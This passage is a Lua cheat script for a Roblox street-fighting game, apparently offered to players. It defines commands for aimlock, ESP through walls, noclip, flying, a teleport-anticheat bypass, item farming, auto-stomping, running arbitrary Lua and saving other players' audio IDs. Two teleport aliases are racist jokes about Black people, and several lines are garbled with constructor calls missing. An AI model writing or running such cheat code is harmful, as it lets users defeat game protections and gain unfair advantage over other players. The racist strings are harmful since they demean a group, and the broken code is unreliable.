  775. GetChar().Humanoid.WalkSpeed = Arguments[1]
  776. WalkSpeed = Arguments[1]
  777. end
  778. end,"speed",{"ws"},"Changes your Humanoids WalkSpeed")
  780. AddCommand(function()
  781. WalkShoot = not WalkShoot
  782. end,"walkshoot",{"noslow"},"Allows you to turn on / off walk shooting")
  784. AddCommand(function(Arguments)
  785. Normalwalk = false
  786. ControlSpeed = Arguments[1]
  787. updateSettings()
  788. end,"crouchspeed",{"cspeed"},"Changes your Crouching speed")
  790. AddCommand(function(Arguments)
  791. Normalwalk = false
  792. ShiftSpeed = Arguments[1]
  793. updateSettings()
  794. end,"sprintspeed",{"sspeed"},"Changes your sprinting speed")
  796. AddCommand(function(Arguments)
  797. GetChar().Humanoid.HipHeight = Arguments[1]
  798. end,"hipheight",{"hh"},"Changes your Humanoids HipHeight")
  800. AddCommand(function(Arguments)
  801. GetChar().Humanoid.JumpPower = Arguments[1]
  802. end,"jumppower",{"jp"},"Changes your Humanoids JumpPower")
  804. AddCommand(function(Arguments)
  805. if not Arguments[1] then
  806. TeleportService:TeleportToPlaceInstance(game.PlaceId,game.JobId)
  807. end
  808. end,"rejoin",{"rj"},"Rejoins your CURRENT game server")
  810. AddCommand(function(Arguments)
  811. if not Arguments[1] then
  812. GetChar():BreakJoints()
  813. end
  816. AirWalk.Anchored = true
  817. AirWalk.Size =,1,5)
  818. AirWalk.Transparency = 1
  819. AirWalk.Material = "Neon"
  820. AddCommand(function(Arguments)
  821. AirWalkOn = not AirWalkOn
  822. AirWalk.Parent = AirWalkOn and workspace or not AirWalkOn and nil
  823. end,"airwalk",{},"Allows you to float in the air")
  825. local NeverSitting = false
  826. AddCommand(function()
  827. NeverSitting = not NeverSitting
  828. if NeverSitting then
  829. local toParent = workspace:GetDescendants()
  830. for i = 1,#toParent do
  831. if string.find(toParent[i].ClassName:lower(),'seat') then
  832. toParent[i].Parent = CoreGui
  833. end
  834. end
  835. else
  836. local toParent = CoreGui:GetChildren()
  837. for i = 1,#toParent do
  838. if string.find(toParent[i].ClassName:lower(),'seat') then
  839. toParent[i].Parent = workspace
  840. end
  841. end
  842. end
  843. end,"neversit",{"nsit"},"Never sit")
  845. AddCommand(function()
  846. AutoDie = not AutoDie
  847. end,"autodie",{"autoreset"},"When Ko'ed auto kills you")
  849. AddCommand(function()
  850. Noclipping = not Noclipping
  851. notif("Command: Noclip: ","Noclip has been set to "..tostring(Noclipping),5,"rbxassetid://1281284684")
  852. end,"noclip",{},"Allows you to walk through walls")
  854. AddCommand(function(Arguments)
  855. if Arguments[1] then
  856. local Player = PlrFinder(Arguments[1])
  857. if Player and Player.Character and Player.Character:FindFirstChild'Head' and Player ~= LP then
  858. Teleport(Player.Character.Head.CFrame)
  859. end
  860. end
  861. end,"goto",{"to"},"Teleports you to the selected player")
  863. AddCommand(function()
  864. TpBypass = not TpBypass
  865. GetChar():BreakJoints()
  866. end,"tpbypass",{},"Turns on tp bypass")
  868. AddCommand(function(Arguments)
  869. if Arguments[1] and tonumber(Arguments[1]) then
  870. ClockTime = Arguments[1]
  871. end
  872. end,"time",{},"Changes the time to the number you set")
  874. AddCommand(function(Arguments)
  875. Blinking = not Blinking
  876. if Blinking then
  877. if not Arguments[1] or not tonumber(Arguments[1]) then
  878. BlinkSpeed = 2
  879. else
  880. BlinkSpeed = Arguments[1]
  881. end
  882. end
  883. notif("Blinking","Has been set to "..tostring(Blinking),5,nil)
  884. end,"blink",{},"Another form of speed, Uses CFrame")
  886. AddCommand(function(Arguments)
  887. if Arguments[1] then
  888. if Arguments[1]:lower() == "shift" then
  889. BlinkMode = "Shift"
  890. elseif Arguments[1]:lower() == "none" then
  891. BlinkMode = "None" -- giving people the illusion of free choice is my motto!
  892. end
  893. updateSettings()
  894. end
  895. end,"blinkmode",{},"Changes Blinkmode")
  897. AddCommand(function(Arguments)
  898. if readfile and writefile then
  899. if Arguments[1] then
  900. if Arguments[1]:lower() == "default" then
  901. Config = "CyrusStreetsAdminSettings"
  902. runsettings()
  903. elseif pcall(readfile,Arguments[1]) then
  904. Config = Arguments[1]
  905. runsettings(Arguments[1])
  906. else
  907. Config = Arguments[1]
  908. savesettings()
  909. runsettings()
  910. end
  911. end
  912. end
  913. end,"config",{},"Changes Config")
  915. AddCommand(function(Arguments)
  916. if Arguments[1] then
  917. Arguments[1] = Arguments[1]:lower()
  918. if Arguments[1] == "banland" then
  919. TeleportService:Teleport(4669040)
  920. elseif Arguments[1] == "normalstreets" then
  921. TeleportService:Teleport(455366377)
  922. elseif Arguments[1] == "uzi" then
  923. GrabThing("Uzi",GetChar().Head.CFrame)
  924. elseif Arguments[1] == "machete" then
  925. GrabThing("Machete",GetChar().Head.CFrame)
  926. elseif Arguments[1] == "spray" then
  927. GrabThing("Spray",GetChar().Head.CFrame)
  928. elseif Arguments[1] == "sawed" or Arguments[1] == "sawedoff" then
  929. GrabThing("SawedOff",GetChar().Head.CFrame)
  930. elseif Arguments[1] == "pipe" then
  931. GrabThing("Pipe",GetChar().Head.CFrame)
  932. elseif Arguments[1] == "glock" then
  933. GrabThing("Glock",GetChar().Head.CFrame)
  934. elseif PartTable and Arguments[1] == "sand" or Arguments[1] == "sandbox" then
  935. Teleport(,3.2000000476837,-117.21733093262))
  936. elseif PartTable and Arguments[1] == "prison" or Arguments[1] == "jail" or Arguments[1] == "whereblacksgoaftertheyattempttorobsaidbank" then
  937. Teleport(,3.199854850769,-78.541763305664))
  938. elseif PartTable and Arguments[1] == "gas" or Arguments[1] == "gasstation" then
  939. Teleport(,18.599975585938,-73.462348937988))
  940. elseif PartTable and Arguments[1] == "court" or Arguments[1] == "basketballcourt" then
  941. Teleport( -191.56864929199,3,223.43171691895))
  942. elseif PartTable and Arguments[1] == "beach" then
  943. Teleport(,1.8657279014587,-369.04748535156))
  944. elseif PartTable and Arguments[1] == "bank" or Arguments[1] == "whatblacksrob" then
  945. Teleport(,4.8757019042969,133.12774658203))
  946. end
  947. end
  948. end,"tpto",{"tp"},"Teleports to places [banland/normalstreets/uzi/machete/spray/sawed/sawedoff/pipe/sand/prison/gas/court/beach/bank]")
  950. local FlySpeed = 10
  951. local FirstFly = true
  953. FlySpeed = SPEED or 10
  954. local T = GetChar():FindFirstChild'HumanoidRootPart' or GetChar():FindFirstChild'Torso'
  955. if not AirWalkOn then
  956. CheckCommand("airwalk") -- decided to use airwalk since it works the best
  957. end
  958. local CONTROL = {F = 0, B = 0, L = 0, R = 0}
  959. local lCONTROL = {F = 0, B = 0, L = 0, R = 0}
  960. local function fly()
  961. flying = true
  962. local BG ='BodyGyro', T)
  963. local BV ='BodyVelocity', T)
  964. BG.P = 9e4
  965. BG.maxTorque =, 9e9, 9e9)
  966. BG.cframe = T.CFrame
  967. BV.velocity =, 0.1, 0)
  968. BV.maxForce =, 9e9, 9e9)
  969. spawn(function()
  970. repeat wait()
  971. if CONTROL.L + CONTROL.R ~= 0 or CONTROL.F + CONTROL.B ~= 0 then
  972. SPEED = 50
  973. elseif not (CONTROL.L + CONTROL.R ~= 0 or CONTROL.F + CONTROL.B ~= 0) and SPEED ~= 0 then
  974. SPEED = 0
  975. end
  976. if (CONTROL.L + CONTROL.R) ~= 0 or (CONTROL.F + CONTROL.B) ~= 0 then
  977. BV.velocity = ((workspace.CurrentCamera.CoordinateFrame.lookVector * (CONTROL.F + CONTROL.B)) + ((workspace.CurrentCamera.CoordinateFrame * + CONTROL.R, (CONTROL.F + CONTROL.B) * 0.2, 0).p) - workspace.CurrentCamera.CoordinateFrame.p)) * SPEED
  979. elseif (CONTROL.L + CONTROL.R) == 0 and (CONTROL.F + CONTROL.B) == 0 and SPEED ~= 0 then
  980. BV.velocity = ((workspace.CurrentCamera.CoordinateFrame.lookVector * (lCONTROL.F + lCONTROL.B)) + ((workspace.CurrentCamera.CoordinateFrame * + lCONTROL.R, (lCONTROL.F + lCONTROL.B) * 0.2, 0).p) - workspace.CurrentCamera.CoordinateFrame.p)) * SPEED
  981. else
  982. BV.velocity =, 0.1, 0)
  983. end
  984. BG.cframe = workspace.CurrentCamera.CoordinateFrame
  985. until not flying
  986. CONTROL = {F = 0, B = 0, L = 0, R = 0}
  987. lCONTROL = {F = 0, B = 0, L = 0, R = 0}
  988. SPEED = 0
  989. BG:destroy()
  990. BV:destroy()
  991. LP.Character:FindFirstChildOfClass'Humanoid'.PlatformStand = false
  992. if AirWalkOn then
  993. CheckCommand("airwalk")
  994. end
  995. end)
  996. end
  997. Mouse.KeyDown:connect(function(KEY)
  998. if KEY:lower() == 'w' then
  999. CONTROL.F = FlySpeed
  1000. elseif KEY:lower() == 's' then
  1001. CONTROL.B = -FlySpeed
  1002. elseif KEY:lower() == 'a' then
  1003. CONTROL.L = -FlySpeed
  1004. elseif KEY:lower() == 'd' then
  1005. CONTROL.R = FlySpeed
  1006. end
  1007. end)
  1008. Mouse.KeyUp:connect(function(KEY)
  1009. if KEY:lower() == 'w' then
  1010. CONTROL.F = 0
  1011. elseif KEY:lower() == 's' then
  1012. CONTROL.B = 0
  1013. elseif KEY:lower() == 'a' then
  1014. CONTROL.L = 0
  1015. elseif KEY:lower() == 'd' then
  1016. CONTROL.R = 0
  1017. end
  1018. end)
  1019. fly()
  1020. if FirstFly then
  1021. flying = false
  1022. wait(0.5)
  1023. fly()
  1024. FirstFly = false
  1025. end
  1026. end
  1028. AddCommand(function(Arguments)
  1029. if not flying then
  1030. fly(Arguments[1] and tonumber(Arguments[1]) or 10)
  1031. else
  1032. flying = false
  1033. end
  1034. end,"fly",{"f"},"Allows you to be like a bird")
  1036. AddCommand(function(Arguments)
  1037. if Arguments[1] then
  1038. if Arguments[1]:lower() == "normal" then
  1039. workspace.CurrentCamera.FieldOfView = OldFov
  1040. elseif tonumber(Arguments[1]) then
  1041. workspace.CurrentCamera.FieldOfView = Arguments[1]
  1042. end
  1043. end
  1044. end,"fov",{},"Changes Field Of View")
  1046. AddCommand(function(Arguments)
  1047. if Arguments[1] then
  1048. if string.lower(Arguments[1]) == "ws" or string.lower(Arguments[1]) == "speed" then
  1049. GetChar():FindFirstChildWhichIsA'Humanoid'.WalkSpeed = Arguments[2]
  1050. Normalwalk = true
  1051. SpawnWS = Arguments[2] or NormalWS
  1052. elseif string.lower(Arguments[1]) == "jp" or string.lower(Arguments[1]) == "jumppower" then
  1053. GetChar():FindFirstChildWhichIsA'Humanoid'.JumpPower = Arguments[2]
  1054. SpawnJP = Arguments[2] or NormalJP
  1055. elseif string.lower(Arguments[1]) == "hh" or string.lower(Arguments[1]) == "hipheight" then
  1056. GetChar():FindFirstChildWhichIsA'Humanoid'.HipHeight = Arguments[2]
  1057. SpawnHH = Arguments[2] or NormalHH
  1058. end
  1059. end
  1060. end,"loop",{},"[Ws/Speed/Jp/JumpPower/HH/HipHeight/]")
  1062. AddCommand(function(Arguments)
  1063. if Arguments[1] then
  1064. local v = PlrFinder(Arguments[1])
  1065. if v then
  1066. if not Arguments[2] then
  1067. notif(v.Name,"Is on "..v.OsPlatform.." and is "..v.AccountAge.." days old",5,nil)
  1068. elseif Arguments[2] and Arguments[2]:lower() == "os" or Arguments[2]:lower() == "operatingsystem" then
  1069. notif(v.Name,"is on "..v.OsPlatform,5,nil)
  1070. elseif Arguments[2] and Arguments[2]:lower() == "age" or Arguments[2]:lower() == "accountage" or Arguments[2]:lower() == "accage" then
  1071. notif(v.Name,"has the account age of "..v.AccountAge,5,nil)
  1072. end
  1073. end
  1074. else
  1075. notif(LP.Name,"you are on "..LP.OsPlatform.."(duh) and your Account Age is "..LP.AccountAge,5,nil)
  1076. end
  1077. end,"playerinfo",{"info"},"PlayerInfo/Info [Player] [Os/OperatingSystem/AccAge/Age/Accountage/none]")
  1079. local AntiAim = false
  1080. AddCommand(function()
  1081. if AntiAim then
  1082. local Tracks = GetChar().Humanoid:GetPlayingAnimationTracks()
  1083. for i = 1,#Tracks do
  1084. if string.find(Tracks[i].Animation.AnimationId,"215384594") then
  1085. Tracks[i]:Stop()
  1086. end
  1087. end
  1088. else
  1089. local Anim ='Animation'
  1090. Anim.AnimationId = "rbxassetid://215384594"
  1091. GetChar().Humanoid:LoadAnimation(Anim):play(5,45,250)
  1092. end
  1093. AntiAim = not AntiAim
  1094. end,"antiaim",{},"breaks shitty aimbots lol")
  1096. AddCommand(function()
  1097. if not PartTable then notif("Sorry,","This command only works on streets.",5,nil) return end
  1098. local PartFound = GetChar():FindFirstChild'HumanoidRootPart' or GetChar():FindFirstChild'Torso'
  1099. math.randomseed(os.time())
  1100. if workspace:FindFirstChild'Cars' then
  1101. local Car = workspace.Cars:GetDescendants()
  1102. for i = 1,#Car do
  1103. local i = math.random(1,#Car)
  1104. if Car[i]:IsA'VehicleSeat' and Car[i].Name == "Drive" and not Car[i].Occupant then
  1105. PartFound.CFrame = Car[i].CFrame
  1106. end
  1107. end
  1108. else
  1109. notif("Command: BringCar","no cars to bring",nil)
  1110. end
  1111. end,"bringcar",{},"Brings a car (Streets only)")
  1113. AddCommand(function(Arguments)
  1114. if Arguments[1] and #Arguments[1] == 1 and Arguments[2] and Keys then
  1115. for Index,Key in pairs(Keys) do
  1116. if Key:match("[%a%d]+$") == Arguments[1]:lower() then
  1117. table.remove(Keys,Index)
  1118. end
  1119. end
  1120. local Hotkey = table.remove(Arguments, 1)
  1121. Keys[#Keys + 1] = table.concat(Arguments, " ").."||"..Hotkey
  1122. if writefile and readfile then
  1123. updateSettings()
  1124. end
  1125. end
  1126. end,"hotkey",{"key"},"Hotkeys a command to a key")
  1128. AddCommand(function()
  1129. if not PartTable then notif("Sorry,","This command only works on streets.",5,nil) return end
  1130. if TpBypass then notif("Due to snakes code","you can not use burgers/drinks with the tpbypass") return end
  1131. if GrabThing("Burger",GetChar().Head.CFrame) then
  1132. local Hamborger = LP.Backpack:FindFirstChild'Burger'
  1133. if Hamborger then
  1134. Hamborger.Parent = GetChar()
  1135. Hamborger:Activate() -- CHEEMS
  1136. repeat RunService.Heartbeat:Wait() until Hamborger.Parent ~= LP.Character
  1137. end
  1138. end
  1139. if GrabThing("Drink",GetChar().Head.CFrame) then
  1140. local Drink = LP.Backpack:FindFirstChild'Drink'
  1141. if Drink then
  1142. Drink.Parent = GetChar()
  1143. Drink:Activate()
  1144. end
  1145. end
  1146. end,"heal",{"h"},"Heals you")
  1148. AddCommand(function(Arguments)
  1149. if not PartTable then notif("Sorry,","This command only works on streets.",5,nil) return end
  1150. HealBot = not HealBot
  1151. if Arguments[1] and Arguments[2] and tonumber(Arguments[2]) and Arguments[1] == "health" then
  1152. HealBotHealth = tonumber(Arguments[2])
  1153. end
  1154. notif("HealBot","Has been set to "..tostring(HealBot),5,nil)
  1155. end,"healbot",{},"Turns on auto healing at a set health (Defaults at 25 hp")
  1157. AddCommand(function()
  1158. if not PartTable then notif("Sorry,","This command only works on streets.",5,nil) return end
  1159. if not GetChar():FindFirstChildOfClass'Tool' then notif("Tool needed","Hold a gun",5,nil) return end
  1160. GrabThing("Ammo",GetChar().Head.CFrame)
  1161. end,"reload",{"r"},"Gives your current gun ammo")
  1163. AddCommand(function()
  1164. DoubleJumpEnabled = not DoubleJumpEnabled
  1165. notif("Command: DoubleJump","has been set to "..tostring(DoubleJumpEnabled),5,"rbxassetid://1281284684")
  1166. end,"doublejump",{},"Allows you to jump infitely")
  1168. AddCommand(function(Arguments)
  1169. if Arguments[1] then
  1170. for Index,Key in pairs(Keys) do
  1171. if Key:match("[%a%d]+$") == Arguments[1]:lower() then
  1172. table.remove(Keys,Index)
  1173. end
  1174. end
  1175. end
  1176. end,"removekey",{"rkey"},"Removes a hotkey to a command")
  1178. AddCommand(function()
  1179. LP:Kick'SHUT'
  1180. end,"sex",{},"Added sex now shut up about it in cyadmin suggestions")
  1182. AddCommand(function()
  1183. Keys = {}
  1184. ClickTpKey = ""
  1185. updateSettings()
  1186. end,"removeallhotkeys",{"removeallkeys"},"Removes all hotkeys")
  1188. AddCommand(function(Arguments)
  1189. if Arguments[1] then
  1190. Arguments[1] = Arguments[1]:lower()
  1191. if Arguments[1] == "outline" then
  1192. Cframe.BackgroundColor3 = Color3.fromRGB(Arguments[2] or 0,Arguments[3] or 0,Arguments[4] or 0)
  1193. elseif Arguments[1] == "text" then
  1194. CText.BackgroundColor3 = Color3.fromRGB(Arguments[2] or 0,Arguments[3] or 0,Arguments[4] or 0)
  1195. elseif Arguments[1] == "background" then
  1196. CmdFrame.BackgroundColor3 = Color3.fromRGB(Arguments[2] or 0,Arguments[3] or 0,Arguments[4] or 0)
  1197. elseif Arguments[1] == "damageindicator" then
  1198. DmgIndicator.TextColor3 = Color3.fromRGB(Arguments[2] or 0,Arguments[3] or 0,Arguments[4] or 0)
  1199. elseif Arguments[1] == "cmds" then
  1200. local Child = CmdFrame:GetChildren()
  1201. for i = 1,#Child do
  1202. if Child[i]:IsA'TextLabel' then
  1203. Child[i].BackgroundColor3 = Color3.fromRGB(Arguments[2] or 0,Arguments[3] or 0,Arguments[4] or 0)
  1204. end
  1205. end
  1206. elseif Arguments[1] == "bullet" then
  1207. BulletColour =[2] or 0,Arguments[3] or 0,Arguments[4] or 0))
  1208. elseif Arguments[1] == "values" then
  1209. DrawingT.Color = Color3.fromRGB(Arguments[2] or 0,Arguments[3] or 0,Arguments[4] or 0)
  1210. elseif Arguments[1] == "itemesp" then
  1211. ItemEspColour = Color3.fromRGB(Arguments[2] or 0,Arguments[3] or 0,Arguments[4] or 0)
  1212. elseif Arguments[1] == "esp" then
  1213. EspColour = Color3.fromRGB(Arguments[2] or 0,Arguments[3] or 0,Arguments[4] or 0)
  1214. else
  1215. notif("Command: Colour","Colour: [BackGround/Text/Outline/cmds/damageindicator/bullet/values/itemesp/esp] [rgb]",5,"rbxassetid://1281284684")
  1216. end
  1217. end
  1218. end,"colour",{"color"},"Changes elements colours Colour [BackGround/Text/Outline/cmds/damageindicator/bullet/values/itemesp/esp]")
  1220. AddCommand(function(Arguments)
  1221. if Arguments[1] then
  1222. ClickTpKey = string.sub(Arguments[1],1,1)
  1223. if readfile and writefile then
  1224. updateSettings()
  1225. end
  1226. end
  1227. end,"clicktp",{"ctp"},"Allows you to teleport around the map with a Key")
  1229. local ViewPlayerConnection,ViewPlayerConnection2;
  1230. AddCommand(function(Arguments)
  1231. if Arguments[1] then
  1232. local Plr = PlrFinder(Arguments[1])
  1233. if Plr and Plr.Character then
  1234. if ViewPlayerConnection then ViewPlayerConnection:Disconnect() ViewPlayerConnection = nil ViewPlayerConnection2:Disconnect() ViewPlayerConnection2 = nil end
  1235. workspace.CurrentCamera.CameraSubject = Plr.Character
  1236. if Arguments[2] and Arguments[2] == "loop" then
  1237. ViewPlayerConnection = Plr.CharacterAdded:Connect(function(C)
  1238. workspace.CurrentCamera.CameraSubject = C
  1239. end)
  1240. LP.CharacterAdded:Connect(function(C)
  1241. if Plr.Character then
  1242. workspace.CurrentCamera.CameraSubject = Plr.Character -- I don't know if this does anything I coded it at 7am but I remember someone saying view plr loop doesn't work when you respawn so
  1243. end
  1244. end)
  1245. end
  1246. end
  1247. end
  1248. end,"view",{},"Allows you to look through a players vision")
  1250. AddCommand(function()
  1251. if ViewPlayerConnection and ViewPlayerConnection2 then ViewPlayerConnection:Disconnect() ViewPlayerConnection2:Disconnect() ViewPlayerConnection = nil ViewPlayerConnection2 = nil end
  1252. workspace.CurrentCamera.CameraSubject = GetChar()
  1253. end,"unview",{},"Brings you back to your normal vision")
  1255. local HR;
  1256. AddCommand(function(Arguments)
  1257. if not GetChar():FindFirstChild'HumanoidRootPart' then notif("Sorry","this can be only used without tpbypass on",5,nil) end
  1258. if HR then
  1259. local CFramex = HR.CFrame
  1260. HR:Destroy()
  1261. HR = nil
  1262. wait(0.5)
  1263. Teleport(CFramex)
  1264. workspace.CurrentCamera.CameraSubject = GetChar()
  1265. else
  1266. local old = GetChar().HumanoidRootPart.CFrame
  1267. HR = GetChar().HumanoidRootPart:Clone()
  1268. HR.Parent = GetChar()
  1269. workspace.CurrentCamera.CameraSubject = GetChar().Head
  1270. HR.CFrame =,0,10000)
  1271. HR.CFrame = old
  1272. end
  1273. end,"fblink",{},"Allows you to \"blink\" around the map")
  1275. AddCommand(function(Arguments)
  1276. if not Freecam then
  1277. Freecam = true
  1278. FreeCam(Arguments[1])
  1279. else
  1280. Freecam = false
  1281. end
  1282. end,"freecam",{},"Allows you to \"free\" view the map")
  1284. AddCommand(function(Arguments)
  1285. if Arguments[1] then
  1286. if Arguments[1]:lower() == "cash" then
  1287. farm("Cash")
  1288. elseif Arguments[1]:lower() == "shotty" then
  1289. farm("Shotty")
  1290. elseif Arguments[1]:lower() == "uzi" then
  1291. farm("Uzi")
  1292. elseif Arguments[1]:lower() == "katana" then
  1293. farm("Katana")
  1294. elseif Arguments[1]:lower() == "sawed off" or Arguments[1]:lower() == "sawed" then
  1295. farm("Sawed Off")
  1296. elseif Arguments[1]:lower() == "all" then
  1297. farm("All")
  1298. elseif Arguments[1]:lower() == "auto" then
  1299. if not AutoFarm then
  1300. farm("Cash")
  1301. end
  1302. local WChild = workspace:GetDescendants()
  1303. for i = 1,#WChild do
  1304. if WChild[i]:IsA'Seat' then
  1305. WChild[i]:Destroy()
  1306. end
  1307. end
  1308. AutoFarm = not AutoFarm
  1309. end
  1310. end
  1311. end,"farm",{},"Grabs you stuff around the map (farm [shotty/cash/uzi/katana/sawed/all/auto] - auto is for cash")
  1313. AddCommand(function()
  1314. ItemEsp = not ItemEsp
  1315. if ItemEsp then
  1316. local ChildrenInMyAttic = workspace:GetChildren()
  1317. for i = 1,#ChildrenInMyAttic do
  1318. if ChildrenInMyAttic[i].Name == "RandomSpawner" then
  1319. addBillBoardGui(ChildrenInMyAttic[i])
  1320. end
  1321. end
  1322. else
  1323. local WChild = workspace:GetChildren()
  1324. for i = 1,#WChild do
  1325. local BBGui = WChild[i]:FindFirstChildOfClass'BillboardGui'
  1326. if WChild[i].Name == "RandomSpawner" and BBGui then
  1327. BBGui:Destroy()
  1328. end
  1329. end
  1330. end
  1331. end,"itemesp",{},"Allows you to see where all the spawners are on the map through walls")
  1333. AddCommand(function(Arguments)
  1334. if Arguments[1] then
  1335. if Arguments[1]:lower() == "all" then notif("STOP IT","NO. JUST NO.",10,nil) return end
  1336. local Player = PlrFinder(Arguments[1])
  1337. if Player ~= LP and Player and tostring(AimlockTarget) ~= tostring(Player) then
  1338. CheckCommand("esp "..Player.Name)
  1339. AimLock = true
  1340. AimlockTarget = Player.Character
  1341. local Connection; -- Localized so that it is only accessible in this function (Otherwise it would be over-wrote every time this command was called and would never be disconnected)
  1342. Connection = Player.CharacterAdded:Connect(function(C)
  1343. if tostring(C) == tostring(AimlockTarget) then
  1344. AimlockTarget = C
  1345. else
  1346. Connection:Disconnect()
  1347. end
  1348. end)
  1349. notif("AimlockTarget has been set to",AimlockTarget.Name,5,nil)
  1350. end
  1351. else
  1352. AimLock = not AimLock
  1353. notif("Aimlock","has been set to "..tostring(AimLock),5,"rbxassetid://1281284684")
  1354. end
  1355. end,"aimlock",{"aim"},"Shoots your gun that is titled 75 degrees at the selected person (Aimlock [Player/nil/loop] - if nil click players to set the aimlock target to them (loop makes it so when they respawn it still locks on)")
  1357. local WhiteListedParts = {
  1358. ['head'] = "Head";
  1359. ['torso'] = "Torso";
  1360. ['humanoidrootpart'] = "HumanoidRootPart";
  1361. ['prediction'] = "Prediction";
  1362. }
  1364. AddCommand(function(Arguments)
  1365. if Arguments[1] then
  1366. if WhiteListedParts[Arguments[1]:lower()] then
  1367. TargetPart = WhiteListedParts[Arguments[1]:lower()]
  1368. updateSettings()
  1369. notif("AimTarget","has been set to "..TargetPart,5,"rbxassetid://1281284684")
  1370. end
  1371. end
  1372. end,"aimtarget",{},"Allows you to pick between a part for aimlock to target/prediction")
  1374. AddCommand(function(Arguments)
  1375. if Arguments[1] and tonumber(Arguments[1]) then
  1376. AimbotVelocity = Arguments[1]
  1377. updateSettings()
  1378. end
  1379. end,"aimvelocity",{},"Changes your aimbot prediction velocity default: 5")
  1381. AddCommand(function(Arguments)
  1382. if Arguments[1] then
  1383. if Arguments[1] == "all" then
  1384. local Players_ = Players:GetPlayers()
  1385. for i = 1,#Players_ do
  1386. if Players_[i] ~= LP and not table.find(EspTable,Players_[i].UserId) then
  1387. table.insert(EspTable,Players_[i].UserId)
  1388. if not UseDraw or Arguments[2] and Arguments[2]:lower() == "legacy" then
  1389. espPlayer(Players_[i],"Legacy")
  1390. else
  1391. espPlayer(Players_[i])
  1392. end
  1393. end
  1394. end
  1395. else
  1396. local Player = PlrFinder(Arguments[1])
  1397. if not Player then return end
  1398. if Player ~= LP and not table.find(EspTable,Player.UserId) then
  1399. table.insert(EspTable,Player.UserId)
  1400. if not UseDraw or Arguments[2] and Arguments[2]:lower() == "legacy" then
  1401. espPlayer(Player,"Legacy")
  1402. else
  1403. espPlayer(Player)
  1404. end
  1405. end
  1406. end
  1407. end
  1408. end,"esp",{},"allows you to see the player through walls (Esp [plr] legacy for the old esp (will default if you do NOT have drawing api)")
  1410. AddCommand(function(Arguments)
  1411. if Arguments[1] and Arguments[2] then
  1412. if Arguments[1]:lower() == "line" then
  1413. if Arguments[2]:lower() == "thickness" and Arguments[3] then
  1414. DrawTable['Thickness'] = tonumber(Arguments[3])
  1415. elseif Arguments[2]:lower() == "transparency" and Arguments[3] then
  1416. DrawTable['Transparency'] = tonumber(Arguments[3])
  1417. elseif Arguments[2]:lower() == "visible" then
  1418. DrawTable['Visible'] = not DrawTable['Visible']
  1419. end
  1420. end
  1421. end
  1422. end,"espsettings",{},"Changes Drawing API esp settings")
  1424. AddCommand(function(Arguments)
  1425. if Arguments[1] then
  1426. local Player = PlrFinder(Arguments[1])
  1427. if not Player then return end
  1428. local A = workspace:GetDescendants()
  1429. table.remove(EspTable,Player.UserId)
  1430. for i = 1,#A do
  1431. if string.sub(A[i].Name, 1, 5) == "[ESP]" and string.sub(A[i].Name, 6) == Player.Name then
  1432. A[i]:Destroy()
  1433. end
  1434. end
  1435. Unesp(Player)
  1436. else
  1437. local A = workspace:GetDescendants()
  1438. EspTable = {}
  1439. for i = 1,#A do
  1440. if string.sub(A[i].Name, 1, 5) == "[ESP]" then
  1441. A[i]:Destroy()
  1442. end
  1443. end
  1444. local P = Players:GetPlayers()
  1445. for i = 1,#P do
  1446. Unesp(P[i])
  1447. end
  1448. end
  1449. end,"unesp",{},"Removes the esp on the player")
  1451. AddCommand(function()
  1452. wait(0.5)
  1453. ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("Made by NotCyrusAtAll | Join the cord at nXcZH36","All")
  1454. end,"advertise",{},"Advertises my discord lol")
  1456. AddCommand(function()
  1457. if GetChar():FindFirstChildOfClass'Tool' then
  1458. GetChar():FindFirstChildOfClass'Tool'.Parent = workspace.Terrain
  1459. end
  1460. end,"droptool",{"drop"},"Drops your current tool")
  1462. AddCommand(function(Arguments)
  1463. if Arguments[1] then
  1464. loadstring(table.concat(Arguments," "))()
  1465. end
  1466. end,"luacode",{"lua"},"Allows you to execute the Lua code you input")
  1468. AddCommand(function()
  1469. AutoStomp = not AutoStomp
  1470. notif("Command: AutoStomp","AutoStomp has been set to "..tostring(AutoStomp),5,"rbxassetid://1281284684")
  1471. end,"autostomp",{},"Turns On/Off AutoStomp")
  1473. AddCommand(function(Arguments)
  1474. if Arguments[1] and Arguments[1]:lower() == "remove" then
  1475. if Arguments[2] then
  1476. local Player = PlrFinder(Arguments[2])
  1477. if Player and Player ~= LP then
  1478. for i,v in pairs(DontStompWhitelisted) do if Player.UserId == v then table.remove(DontStompWhitelisted,i) end end
  1479. end
  1480. else
  1481. DontStompWhitelisted = {}
  1482. end
  1483. else
  1484. local Player = PlrFinder(Arguments[1])
  1485. if Player and Player ~= LP then
  1486. table.insert(DontStompWhitelisted,Player.UserId)
  1487. end
  1488. end
  1489. end,"autostompwhitelist",{},"Whitelists to autostomp so that it doesn't stomp them")
  1491. AddCommand(function(Arguments)
  1492. if Arguments[1] and Arguments[1] == "legacy" then
  1493. if GetChar():FindFirstChild'Right Arm' then
  1494. GetChar()['Right Arm']:Destroy()
  1495. end
  1496. else
  1497. local ToolTable,CurrentTools = {},LP.Backpack:GetChildren()
  1498. for i = 1,#CurrentTools do
  1499. local Tool = CurrentTools[i]
  1500. if Tool:IsA'Tool' then
  1501. ToolTable[#ToolTable + 1] = Tool
  1502. end
  1503. end
  1504. GetChar().ChildAdded:Connect(function(T)
  1505. local TempTable;
  1506. if T:IsA'Tool' then
  1507. if table.find(ToolTable,T) then return end
  1508. wait()
  1509. T.Parent = LP.Backpack
  1510. table.insert(ToolTable,T)
  1511. end
  1512. end)
  1513. end
  1514. end,"antikill",{},"Turns on Anti FE kill for your current life")
  1516. AddCommand(function(Arguments)
  1517. if Arguments[1] then
  1518. local Player = PlrFinder(Arguments[1])
  1519. if Player and Player.Character then
  1520. local PlayerChild = Player.Character:GetDescendants()
  1521. for i = 1,#PlayerChild do
  1522. local v = PlayerChild[i]
  1523. if v:IsA'Sound' and v.Name == "SoundX" or v.Name == "son" then
  1524. notif("Stole the Audio","From "..Player.Name.." check your exploits workspace folder",5,nil)
  1525. writefile("AudioLog From "..Player.Name.." "..math.random(1,99)..".txt","Stolen ID: "..v.SoundId:match"%d+".." From: "..Player.Name)
  1526. end
  1527. end
  1528. end
  1529. end
  1530. end,"steal",{},"Steals a persons audio")
  1532. AddCommand(function(Arguments)
  1533. if Arguments[1] then
  1534. local Player = PlrFinder(Arguments[1])
  1535. if Player then
  1536. local FindDecal = workspace:FindFirstChild(Player.Name.."Spray")
  1537. if FindDecal and FindDecal:FindFirstChildOfClass'Decal' then
